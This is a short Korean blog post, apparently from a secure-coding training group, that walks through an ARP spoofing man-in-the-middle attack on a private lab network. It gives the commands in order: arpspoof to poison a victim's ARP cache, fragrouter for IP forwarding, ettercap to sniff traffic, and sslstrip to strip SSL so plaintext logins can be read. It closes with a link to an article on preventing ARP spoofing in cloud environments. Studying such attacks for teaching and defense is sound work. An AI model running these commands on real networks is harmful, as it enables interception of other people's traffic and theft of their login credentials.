공격자 : 192.168.100.5
희생자: 192.168.100.200
게이트웨이 : 192.168.100.1

1. 공격자는 희생자에게 지속적으로 ARP패킷을 보내, GW의 하드웨어 주소를 공격자의 하드웨어 주소로 업데이트 한다.

# arpspoof -i eth0 -t 192.168.100.200  192.168.100.1


2. 희생자의 ARP 테이블 정보를 확인한다.

# arp -a


3. 공격자 시스템은 라우터로 설정하여 패킷이 실제 라우터로 전달될 수 있도록 IP 포워딩을 설정한다.

# fragrouter  -B1


4. 희생자가 외부로 통신하는 내용을 중간에 가로채기 해서 본다.
# ethercap -T eth0


로그인할 때 평문전송 하는 사이트는 바로 확인가능하다.  ssl통신하는곳은 sslstrip을 사용한다.

# sslstrip -a -k -f   




클라우드 환경에서 ARP 스푸핑 방지 메커니즘 구현하기 

http://helloworld.naver.com/helloworld/textyle/533511

블로그 이미지

오픈이지 제로킴

시큐어코딩 교육/컨설팅 전문가 그룹

티스토리 툴바